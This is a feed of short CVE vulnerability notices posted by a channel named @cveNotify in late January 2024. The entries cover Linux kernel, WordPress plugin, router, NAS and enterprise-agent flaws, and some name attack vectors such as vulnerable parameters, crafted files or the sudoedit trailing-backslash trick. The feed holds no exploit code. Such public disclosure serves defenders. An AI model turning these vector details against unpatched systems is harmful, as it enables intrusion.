🚨 CVE-2024-0914A timing side-channel vulnerability has been discovered in the opencryptoki package while processing RSA PKCS#1 v1.5 padded ciphertexts. This flaw could potentially enable unauthorized RSA ciphertext decryption or signing, even without access to the corresponding private key.🎖@cveNotify |
|
| 2024-01-31 03:37:32 |
🚨 CVE-2024-1069The Contact Form Entries plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation on the 'view_page' function in versions up to, and including, 1.3.2. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-01-31 03:37:26 |
🚨 CVE-2023-31505An arbitrary file upload vulnerability in Schlix CMS v2.2.8-1, allows remote authenticated attackers to execute arbitrary code and obtain sensitive information via a crafted .phtml file.🎖@cveNotify |
|
| 2024-01-31 03:37:25 |
🚨 CVE-2023-50495NCurse v6.4-20230418 was discovered to contain a segmentation fault via the component _nc_wrap_entry().🎖@cveNotify |
|
| 2024-01-31 03:37:24 |
🚨 CVE-2023-29491ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.🎖@cveNotify |
|
| 2024-01-31 02:37:24 |
🚨 CVE-2024-22569Stored Cross-Site Scripting (XSS) vulnerability in POSCMS v4.6.2, allows attackers to execute arbitrary code via a crafted payload to /index.php?c=install&m=index&step=2&is_install_db=0.🎖@cveNotify |
|
| 2024-01-31 00:37:32 |
🚨 CVE-2021-33631Integer Overflow or Wraparound vulnerability in openEuler kernel on Linux (filesystem modules) allows Forced Integer Overflow.This issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3, from 5.10.0-60.18.0 before 5.10.0-183.0.0.🎖@cveNotify |
|
| 2024-01-31 00:37:26 |
🚨 CVE-2021-33630NULL Pointer Dereference vulnerability in openEuler kernel on Linux (network modules) allows Pointer Manipulation. This vulnerability is associated with program files net/sched/sch_cbs.C.This issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3.🎖@cveNotify |
|
| 2024-01-31 00:37:25 |
🚨 CVE-2023-3341The code that processes control channel messages sent to `named` calls certain functions recursively during packet parsing. Recursion depth is only limited by the maximum accepted packet size; depending on the environment, this may cause the packet-parsing code to run out of available stack memory, causing `named` to terminate unexpectedly. Since each incoming control channel message is fully parsed before its contents are authenticated, exploiting this flaw does not require the attacker to hold a valid RNDC key; only network access to the control channel's configured TCP port is necessary.This issue affects BIND 9 versions 9.2.0 through 9.16.43, 9.18.0 through 9.18.18, 9.19.0 through 9.19.16, 9.9.3-S1 through 9.16.43-S1, and 9.18.0-S1 through 9.18.18-S1.🎖@cveNotify |
|
| 2024-01-31 00:37:24 |
🚨 CVE-2023-4508A user able to control file input to Gerbv, between versions 2.4.0 and 2.10.0, can cause a crash and cause denial-of-service with a specially crafted Gerber RS-274X file.🎖@cveNotify |
|
| 2024-01-30 23:37:24 |
🚨 CVE-2023-45779In the APEX module framework of AOSP, there is a possible malicious update to platform components due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. More details on this can be found in the links below: * https://rtx.meta.security/exploitation/2024/01/30/Android-vendors-APEX-test-keys.html * https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-wmcc-g67r-9962🎖@cveNotify |
|
| 2024-01-30 23:07:32 |
🚨 CVE-2017-20189In Clojure before 1.9.0, classes can be used to construct a serialized object that executes arbitrary code upon deserialization. This is relevant if a server deserializes untrusted objects.🎖@cveNotify |
|
| 2024-01-30 23:07:25 |
🚨 CVE-2024-0408A flaw was found in the X.Org server. The GLX PBuffer code does not call the XACE hook when creating the buffer, leaving it unlabeled. When the client issues another request to access that resource (as with a GetGeometry) or when it creates another resource that needs to access that buffer, such as a GC, the XSELINUX code will try to use an object that was never labeled and crash because the SID is NULL.🎖@cveNotify |
|
| 2024-01-30 23:07:24 |
🚨 CVE-2024-0317Cross-Site Scripting in FireEye EX, affecting version 9.0.3.936727. Exploitation of this vulnerability allows an attacker to send a specially crafted JavaScript payload via the 'type' and 's_f_name' parameters to an authenticated user to retrieve their session details.🎖@cveNotify |
|
| 2024-01-30 22:37:32 |
🚨 CVE-2024-22380Electronic Delivery Check System (Ministry of Agriculture, Forestry and Fisheries The Agriculture and Rural Development Project Version) March, Heisei 31 era edition Ver.14.0.001.002 and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.🎖@cveNotify |
|
| 2024-01-30 22:37:25 |
🚨 CVE-2024-21735SAP LT Replication Server - version S4CORE 103, S4CORE 104, S4CORE 105, S4CORE 106, S4CORE 107, S4CORE 108, does not perform necessary authorization checks. This could allow an attacker with high privileges to perform unintended actions, resulting in escalation of privileges, which has High impact on confidentiality, integrity and availability of the system.🎖@cveNotify |
|
| 2024-01-30 22:37:24 |
🚨 CVE-2018-7550The load_multiboot function in hw/i386/multiboot.c in Quick Emulator (aka QEMU) allows local guest OS users to execute arbitrary code on the QEMU host via a mh_load_end_addr value greater than mh_bss_end_addr, which triggers an out-of-bounds read or write memory access.🎖@cveNotify |
|
| 2024-01-30 22:07:24 |
🚨 CVE-2022-4964Ubuntu's pipewire-pulse in snap grants microphone access even when the snap interface for audio-record is not set.🎖@cveNotify |
|
| 2024-01-30 21:37:32 |
🚨 CVE-2024-22751D-Link DIR-882 DIR882A1_FW130B06 was discovered to contain a stack overflow via the sub_477AA0 function.🎖@cveNotify |
|
| 2024-01-30 21:37:26 |
🚨 CVE-2023-24676An issue found in Processwire 3.0.210 allows attackers to execute arbitrary code and install a reverse shell via the download_zip_url parameter when installing a new module.🎖@cveNotify |
|
| 2024-01-30 21:37:25 |
🚨 CVE-2022-39046An issue was discovered in the GNU C Library (glibc) 2.36. When the syslog function is passed a crafted input string larger than 1024 bytes, it reads uninitialized memory from the heap and prints it to the target log file, potentially revealing a portion of the contents of the heap.🎖@cveNotify |
|
| 2024-01-30 21:37:24 |
🚨 CVE-2021-3156Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character.🎖@cveNotify |
|
| 2024-01-30 21:07:32 |
🚨 CVE-2023-52040An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the sub_41284C function.🎖@cveNotify |
|
| 2024-01-30 21:07:25 |
🚨 CVE-2020-27820A vulnerability was found in Linux kernel, where a use-after-frees in nouveau's postclose() handler could happen if removing device (that is not common to remove video card physically without power-off, but same happens if "unbind" the driver).🎖@cveNotify |
|
| 2024-01-30 21:07:24 |
🚨 CVE-2021-32785mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. When mod_auth_openidc versions prior to 2.4.9 are configured to use an unencrypted Redis cache (`OIDCCacheEncrypt off`, `OIDCSessionType server-cache`, `OIDCCacheType redis`), `mod_auth_openidc` wrongly performed argument interpolation before passing Redis requests to `hiredis`, which would perform it again and lead to an uncontrolled format string bug. Initial assessment shows that this bug does not appear to allow gaining arbitrary code execution, but can reliably provoke a denial of service by repeatedly crashing the Apache workers. This bug has been corrected in version 2.4.9 by performing argument interpolation only once, using the `hiredis` API. As a workaround, this vulnerability can be mitigated by setting `OIDCCacheEncrypt` to `on`, as cache keys are cryptographically hashed before use when this option is enabled.🎖@cveNotify |
|
| 2024-01-30 20:37:32 |
🚨 CVE-2024-22141Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Cozmoslabs Profile Builder Pro.This issue affects Profile Builder Pro: from n/a through 3.10.0.🎖@cveNotify |
|
| 2024-01-30 20:37:25 |
🚨 CVE-2023-46407FFmpeg prior to commit bf814 was discovered to contain an out of bounds read via the dist->alphabet_size variable in the read_vlc_prefix() function.🎖@cveNotify |
|
| 2024-01-30 20:37:24 |
🚨 CVE-2021-43803Next.js is a React framework. In versions of Next.js prior to 12.0.5 or 11.1.3, invalid or malformed URLs could lead to a server crash. In order to be affected by this issue, the deployment must use Next.js versions above 11.1.0 and below 12.0.5, Node.js above 15.0.0, and next start or a custom server. Deployments on Vercel are not affected, along with similar environments where invalid requests are filtered before reaching Next.js. Versions 12.0.5 and 11.1.3 contain patches for this issue.🎖@cveNotify |
|
| 2024-01-30 19:07:24 |
🚨 CVE-2023-52324An unrestricted file upload vulnerability in Trend Micro Apex Central could allow a remote attacker to create arbitrary files on affected installations.Please note: although authentication is required to exploit this vulnerability, this vulnerability could be exploited when the attacker has any valid set of credentials. Also, this vulnerability could be potentially used in combination with another vulnerability to execute arbitrary code.🎖@cveNotify |
|
| 2024-01-30 18:37:32 |
🚨 CVE-2023-47197An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.This vulnerability is similar to, but not identical to, CVE-2023-47198.🎖@cveNotify |
|
| 2024-01-30 18:37:26 |
🚨 CVE-2023-47196An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.This vulnerability is similar to, but not identical to, CVE-2023-47197.🎖@cveNotify |
|
| 2024-01-30 18:37:25 |
🚨 CVE-2021-33630NULL Pointer Dereference vulnerability in openEuler kernel on Linux (network modules) allows Pointer Manipulation. This vulnerability is associated with program files net/sched/sch_cbs.C.This issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3.🎖@cveNotify |
|
| 2024-01-30 18:37:24 |
🚨 CVE-2023-45779In the APEX module framework of AOSP, there is a possible malicious update to platform components due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. More details on this can be found in the links below: https://rtx.meta.security/exploitation/2024/01/30/Android-vendors-APEX-test-keys.html https://rtx.meta.security/exploitation/2024/01/30/Android-vendors-APEX-test-keys.html https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-wmcc-g67r-9962 https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-wmcc-g67r-9962🎖@cveNotify |
|
| 2024-01-30 18:07:32 |
🚨 CVE-2024-22284Deserialization of Untrusted Data vulnerability in Thomas Belser Asgaros Forum.This issue affects Asgaros Forum: from n/a through 2.7.2.🎖@cveNotify |
|
| 2024-01-30 18:07:26 |
🚨 CVE-2023-52094An updater link following vulnerability in the Trend Micro Apex One agent could allow a local attacker to abuse the updater to delete an arbitrary folder, leading for a local privilege escalation on affected installations.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-01-30 18:07:25 |
🚨 CVE-2023-47192An agent link vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-01-30 18:07:24 |
🚨 CVE-2024-23218A timing side-channel issue was addressed with improvements to constant-time computation in cryptographic functions. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An attacker may be able to decrypt legacy RSA PKCS#1 v1.5 ciphertexts without having the private key.🎖@cveNotify |
|
| 2024-01-30 17:37:32 |
🚨 CVE-2024-23208The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-01-30 17:37:26 |
🚨 CVE-2023-5178A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe-oF/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation problem.🎖@cveNotify |
|
| 2024-01-30 17:37:25 |
🚨 CVE-2023-3567A use-after-free flaw was found in vcs_read in drivers/tty/vt/vc_screen.c in vc_screen in the Linux Kernel. This issue may allow an attacker with local user access to cause a system crash or leak internal kernel information.🎖@cveNotify |
|
| 2024-01-30 17:37:24 |
🚨 CVE-2023-3019A DMA reentrancy issue leading to a use-after-free error was found in the e1000e NIC emulation code in QEMU. This issue could allow a privileged guest user to crash the QEMU process on the host, resulting in a denial of service.🎖@cveNotify |
|
| 2024-01-30 17:07:25 |
🚨 CVE-2023-47034A vulnerability in UniswapFrontRunBot 0xdB94c allows attackers to cause financial losses via unspecified vectors.🎖@cveNotify |
|
| 2024-01-30 17:07:24 |
🚨 CVE-2023-47033MultiSigWallet 0xF0C99 was discovered to contain a reentrancy vulnerability via the function executeTransaction.🎖@cveNotify |
|
| 2024-01-30 16:37:32 |
🚨 CVE-2023-42753An array indexing vulnerability was found in the netfilter subsystem of the Linux kernel. A missing macro could lead to a miscalculation of the `h->nets` array offset, providing attackers with the primitive to arbitrarily increment/decrement a memory buffer out-of-bound. This issue may allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-30 16:37:26 |
🚨 CVE-2023-3812An out-of-bounds memory access flaw was found in the Linux kernel’s TUN/TAP device driver functionality in how a user generates a malicious (too big) networking packet when napi frags is enabled. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-30 16:37:25 |
🚨 CVE-2023-34966An infinite loop vulnerability was found in Samba's mdssvc RPC service for Spotlight. When parsing Spotlight mdssvc RPC packets sent by the client, the core unmarshalling function sl_unpack_loop() did not validate a field in the network packet that contains the count of elements in an array-like structure. By passing 0 as the count value, the attacked function will run in an endless loop consuming 100% CPU. This flaw allows an attacker to issue a malformed RPC request, triggering an infinite loop, resulting in a denial of service condition.🎖@cveNotify |
|
| 2024-01-30 16:37:24 |
🚨 CVE-2022-2127An out-of-bounds read vulnerability was found in Samba due to insufficient length checks in winbindd_pam_auth_crap.c. When performing NTLM authentication, the client replies to cryptographic challenges back to the server. These replies have variable lengths, and Winbind fails to check the lan manager response length. When Winbind is used for NTLM authentication, a maliciously crafted request can trigger an out-of-bounds read in Winbind, possibly resulting in a crash.🎖@cveNotify |
|
| 2024-01-30 16:07:24 |
🚨 CVE-2024-23217A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. An app may be able to bypass certain Privacy preferences.🎖@cveNotify |
|
| 2024-01-30 15:37:33 |
🚨 CVE-2023-28743Improper input validation for some Intel NUC BIOS firmware before version QN0073 may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-01-30 15:37:26 |
🚨 CVE-2024-22415jupyter-lsp is a coding assistance tool for JupyterLab (code navigation + hover suggestions + linters + autocompletion + rename) using Language Server Protocol. Installations of jupyter-lsp running in environments without configured file system access control (on the operating system level), and with jupyter-server instances exposed to non-trusted network are vulnerable to unauthorised access and modification of file system beyond the jupyter root directory. This issue has been patched in version 2.2.2 and all users are advised to upgrade. Users unable to upgrade should uninstall jupyter-lsp.🎖@cveNotify |
|
| 2024-01-30 15:37:25 |
🚨 CVE-2024-23347Prior to v176, when opening a new project Meta Spark Studio would execute scripts defined inside of a package.json file included as part of that project. Those scripts would have the ability to execute arbitrary code on the system as the application.🎖@cveNotify |
|
| 2024-01-30 15:07:28 |
🚨 CVE-2023-47035RPTC 0x3b08c was discovered to not conduct status checks on the parameter tradingOpen. This vulnerability can allow attackers to conduct unauthorized transfer operations.🎖@cveNotify |
|
| 2024-01-30 15:07:27 |
🚨 CVE-2023-3771The T1 WordPress theme through 19.0 is vulnerable to unauthenticated open redirect with which any attacker and redirect users to arbitrary websites.🎖@cveNotify |
|
| 2024-01-30 14:07:25 |
🚨 CVE-2024-0778** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in Uniview ISC 2500-S up to 20210930. Affected by this issue is the function setNatConfig of the file /Interface/DevManage/VM.php. The manipulation of the argument natAddress/natPort/natServerPort leads to os command injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251696. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-01-30 14:07:24 |
🚨 CVE-2023-49351A stack-based buffer overflow vulnerability in /bin/webs binary in Edimax BR6478AC V2 firmware veraion v1.23 allows attackers to overwrite other values located on the stack due to an incorrect use of the strcpy() function.🎖@cveNotify |
|
| 2024-01-30 13:37:26 |
🚨 CVE-2024-1031A vulnerability was found in CodeAstro Expense Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file templates/5-Add-Expenses.php of the component Add Expenses Page. The manipulation of the argument item leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252304.🎖@cveNotify |
|
| 2024-01-30 13:37:25 |
🚨 CVE-2024-0674Privilege escalation vulnerability in Lamassu Bitcoin ATM Douro machines, in its 7.1 version, which could allow a local user to acquire root permissions by modifying the updatescript.js, inserting special code inside the script and creating the done.txt file. This would cause the watchdog process to run as root and execute the payload stored in the updatescript.js.🎖@cveNotify |
|
| 2024-01-30 13:37:24 |
🚨 CVE-2023-7192A memory leak problem was found in ctnetlink_create_conntrack in net/netfilter/nf_conntrack_netlink.c in the Linux Kernel. This issue may allow a local attacker with CAP_NET_ADMIN privileges to cause a denial of service (DoS) attack due to a refcount overflow.🎖@cveNotify |
|
| 2024-01-30 10:37:24 |
🚨 CVE-2024-1030A vulnerability was found in Cogites eReserv 7.7.58. It has been classified as problematic. This affects an unknown part of the file /front/admin/tenancyDetail.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-252303.🎖@cveNotify |
|
| 2024-01-30 09:37:32 |
🚨 CVE-2023-6942Missing Authentication for Critical Function vulnerability in Mitsubishi Electric Corporation EZSocket versions 3.0 and later, FR Configurator2 all versions, GT Designer3 Version1(GOT1000) all versions, GT Designer3 Version1(GOT2000) all versions, GX Works2 versions 1.11M and later, GX Works3 all versions, MELSOFT Navigator versions 1.04E and later, MT Works2 all versions, MX Component versions 4.00A and later and MX OPC Server DA/UA all versions allows a remote unauthenticated attacker to bypass authentication by sending specially crafted packets and connect to the products illegally.🎖@cveNotify |
|
| 2024-01-30 09:37:26 |
🚨 CVE-2023-6374Authentication Bypass by Capture-replay vulnerability in Mitsubishi Electric Corporation MELSEC WS Series WS0-GETH00200 all serial numbers allows a remote unauthenticated attacker to bypass authentication by capture-replay attack and illegally login to the affected module. As a result, the remote attacker who has logged in illegally may be able to disclose or tamper with the programs and parameters in the modules.🎖@cveNotify |
|
| 2024-01-30 09:37:25 |
🚨 CVE-2024-1015Remote command execution vulnerability in SE-elektronic GmbH E-DDC3.3 affecting versions 03.07.03 and higher. An attacker could send different commands from the operating system to the system via the web configuration functionality of the device.🎖@cveNotify |
|
| 2024-01-30 09:37:24 |
🚨 CVE-2024-1014Uncontrolled resource consumption vulnerability in SE-elektronic GmbH E-DDC3.3 affecting versions 03.07.03 and higher. An attacker could interrupt the availability of the administration panel by sending multiple ICMP packets.🎖@cveNotify |
|
| 2024-01-30 08:37:25 |
🚨 CVE-2024-21803Use After Free vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (bluetooth modules) allows Local Execution of Code. This vulnerability is associated with program files https://gitee.Com/anolis/cloud-kernel/blob/devel-5.10/net/bluetooth/af_bluetooth.C.This issue affects Linux kernel: from v2.6.12-rc2 before v6.8-rc1.🎖@cveNotify |
|
| 2024-01-30 08:37:24 |
🚨 CVE-2023-7225The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the width and height parameters in all versions up to, and including, 2.88.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-01-30 07:37:26 |
🚨 CVE-2024-22648A Blind SSRF vulnerability exists in the "Crawl Meta Data" functionality of SEO Panel version 4.10.0. This makes it possible for remote attackers to scan ports in the local environment.🎖@cveNotify |
|
| 2024-01-30 07:37:25 |
🚨 CVE-2024-22646An email address enumeration vulnerability exists in the password reset function of SEO Panel version 4.10.0. This allows an attacker to guess which emails exist on the system.🎖@cveNotify |
|
| 2024-01-30 07:37:24 |
🚨 CVE-2023-52071tiny-curl-8_4_0 , curl-8_4_0 and curl-8_5_0 were discovered to contain an off-by-one out-of-bounds array index via the component tool_cb_wrt.🎖@cveNotify |
|
| 2024-01-30 05:37:24 |
🚨 CVE-2023-6395The Mock software contains a vulnerability wherein an attacker could potentially exploit privilege escalation, enabling the execution of arbitrary code with root user privileges. This weakness stems from the absence of proper sandboxing during the expansion and execution of Jinja2 templates, which may be included in certain configuration parameters. While the Mock documentation advises treating users added to the mock group as privileged, certain build systems invoking mock on behalf of users might inadvertently permit less privileged users to define configuration tags. These tags could then be passed as parameters to mock during execution, potentially leading to the utilization of Jinja2 templates for remote privilege escalation and the execution of arbitrary code as the root user on the build server.🎖@cveNotify |
|
| 2024-01-30 04:37:25 |
🚨 CVE-2023-5178A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe-oF/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation problem.🎖@cveNotify |
|
| 2024-01-30 04:37:24 |
🚨 CVE-2023-3812An out-of-bounds memory access flaw was found in the Linux kernel’s TUN/TAP device driver functionality in how a user generates a malicious (too big) networking packet when napi frags is enabled. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-30 03:37:25 |
🚨 CVE-2024-21840Incorrect Default Permissions vulnerability in Hitachi Storage Plug-in for VMware vCenter allows local users to read and write specific files.This issue affects Hitachi Storage Plug-in for VMware vCenter: from 04.0.0 through 04.9.2.🎖@cveNotify |
|
| 2024-01-30 03:37:24 |
🚨 CVE-2024-1027A vulnerability, which was classified as critical, was found in SourceCodester Facebook News Feed Like 1.0. Affected is an unknown function of the component Post Handler. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-252300.🎖@cveNotify |
|
| 2024-01-30 02:07:25 |
🚨 CVE-2024-0587The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'disqus_name' parameter in all versions up to, and including, 1.0.92.1 due to insufficient input sanitization and output escaping on the executed JS file. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-01-30 02:07:24 |
🚨 CVE-2023-39197An out-of-bounds read vulnerability was found in Netfilter Connection Tracking (conntrack) in the Linux kernel. This flaw allows a remote user to disclose sensitive information via the DCCP protocol.🎖@cveNotify |
|
| 2024-01-30 01:37:32 |
🚨 CVE-2023-5372The post-authentication command injection vulnerability in Zyxel NAS326 firmware versions through V5.21(AAZF.15)C0 and NAS542 firmware versions through V5.21(ABAG.12)C0 could allow an authenticated attacker with administrator privileges to execute some operating system (OS) commands by sending a crafted query parameter attached to the URL of an affected device’s web management interface.🎖@cveNotify |
|
| 2024-01-30 01:37:25 |
🚨 CVE-2023-51837Ylianst MeshCentral 1.1.16 is vulnerable to Missing SSL Certificate Validation.🎖@cveNotify |
|
| 2024-01-30 01:37:24 |
🚨 CVE-2023-37571Softing TH SCOPE through 3.70 allows XSS.🎖@cveNotify |
|
| 2024-01-30 00:37:24 |
🚨 CVE-2024-23849In rds_recv_track_latency in net/rds/af_rds.c in the Linux kernel through 6.7.1, there is an off-by-one error for an RDS_MSG_RX_DGRAM_TRACE_MAX comparison, resulting in out-of-bounds access.🎖@cveNotify |
|
| 2024-01-29 23:37:25 |
🚨 CVE-2024-23829aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Security-sensitive parts of the Python HTTP parser retained minor differences in allowable character sets, that must trigger error handling to robustly match frame boundaries of proxies in order to protect against injection of additional requests. Additionally, validation could trigger exceptions that were not handled consistently with processing of other malformed input. Being more lenient than internet standards require could, depending on deployment environment, assist in request smuggling. The unhandled exception could cause excessive resource consumption on the application server and/or its logging facilities. This vulnerability exists due to an incomplete fix for CVE-2023-47627. Version 3.9.2 fixes this vulnerability.🎖@cveNotify |
|
| 2024-01-29 23:37:24 |
🚨 CVE-2024-1022A vulnerability, which was classified as problematic, was found in CodeAstro Simple Student Result Management System 5.6. This affects an unknown part of the file /add_classes.php of the component Add Class Page. The manipulation of the argument Class Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252291.🎖@cveNotify |
|
| 2024-01-29 23:07:32 |
🚨 CVE-2024-23182Relative path traversal vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to delete arbitrary files on the server.🎖@cveNotify |
|
| 2024-01-29 23:07:26 |
🚨 CVE-2024-23181Cross-site scripting vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote unauthenticated attacker to execute an arbitrary script on the logged-in user's web browser.🎖@cveNotify |
|
| 2024-01-29 23:07:25 |
🚨 CVE-2024-23851copy_params in drivers/md/dm-ioctl.c in the Linux kernel through 6.7.1 can attempt to allocate more than INT_MAX bytes, and crash, because of a missing param_kernel->data_size check. This is related to ctl_ioctl.🎖@cveNotify |
|
| 2024-01-29 23:07:24 |
🚨 CVE-2024-23850In btrfs_get_root_ref in fs/btrfs/disk-io.c in the Linux kernel through 6.7.1, there can be an assertion failure and crash because a subvolume can be read out too soon after its root item is inserted upon subvolume creation.🎖@cveNotify |
|
| 2024-01-29 22:37:25 |
🚨 CVE-2023-25835There is a stored Cross-site Scripting vulnerability in Esri Portal for ArcGIS Enterprise Sites versions 10.8.1 – 11.1 that may allow a remote, authenticated attacker to create a crafted link that is stored in the site configuration which when clicked could potentially execute arbitrary JavaScript code in the victims browser. The privileges required to execute this attack are high. The impact to Confidentiality, Integrity and Availability are High.🎖@cveNotify |
|
| 2024-01-29 22:37:24 |
🚨 CVE-2021-3169An issue in Jumpserver before 2.6.2, before 2.5.4, before 2.4.5 allows attackers to create a connection token through an API which does not have access control and use it to access sensitive assets.🎖@cveNotify |
|
| 2024-01-29 21:37:32 |
🚨 CVE-2023-49038Command injection in the ping utility on Buffalo LS210D 1.78-0.03 allows a remote authenticated attacker to inject arbitrary commands onto the NAS as root.🎖@cveNotify |
|
| 2024-01-29 21:37:25 |
🚨 CVE-2023-35793An issue was discovered in Cassia Access Controller 2.1.1.2303271039. Establishing a web SSH session to gateways is vulnerable to Cross Site Request Forgery (CSRF) attacks.🎖@cveNotify |
|
| 2024-01-29 21:37:24 |
🚨 CVE-2023-31445Cassia Access controller before 2.1.1.2203171453, was discovered to have a unprivileged -information disclosure vulnerability that allows read-only users have the ability to enumerate all other users and discover e-mail addresses, phone numbers, and privileges of all other users.🎖@cveNotify |
|
| 2024-01-29 21:07:25 |
🚨 CVE-2023-6926There is an OS command injection vulnerability in Crestron AM-300 firmware version 1.4499.00018 which may enable a user of a limited-access SSH session to escalate their privileges to root-level access.🎖@cveNotify |
|
| 2024-01-29 21:07:24 |
🚨 CVE-2023-49314Asana Desktop 2.1.0 on macOS allows code injection because of specific Electron Fuses. There is inadequate protection against code injection through settings such as RunAsNode and EnableNodeCliInspectArguments, and thus r3ggi/electroniz3r can be used to perform an attack.🎖@cveNotify |
|
| 2024-01-29 20:37:32 |
🚨 CVE-2023-51840DoraCMS 2.1.8 is vulnerable to Use of Hard-coded Cryptographic Key.🎖@cveNotify |
|
| 2024-01-29 20:37:26 |
🚨 CVE-2023-51839DeviceFarmer stf v3.6.6 suffers from Use of a Broken or Risky Cryptographic Algorithm.🎖@cveNotify |
|
| 2024-01-29 20:37:25 |
🚨 CVE-2023-52090A security agent link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-01-29 20:37:24 |
🚨 CVE-2023-47201A plug-in manager origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.This vulnerability is similar to, but not identical to, CVE-2023-47200.🎖@cveNotify |
|
| 2024-01-29 20:07:32 |
🚨 CVE-2024-22417Whoogle Search is a self-hosted metasearch engine. In versions 0.8.3 and prior, the `element` method in `app/routes.py` does not validate the user-controlled `src_type` and `element_url` variables and passes them to the `send` method which sends a `GET` request on lines 339-343 in `requests.py`. The returned contents of the URL are then passed to and reflected back to the user in the `send_file` function on line 484, together with the user-controlled `src_type`, which allows the attacker to control the HTTP response content type leading to a cross-site scripting vulnerability. An attacker could craft a special URL to point to a malicious website and send the link to a victim. The fact that the link would contain a trusted domain (e.g. from one of public Whoogle instances) could be used to trick the user into clicking the link.The malicious website could, for example, be a copy of a real website, meant to steal a person’s credentials to the website, or trick that person in another way. Version 0.8.4 contains a patch for this issue.🎖@cveNotify |
|
| 2024-01-29 20:07:25 |
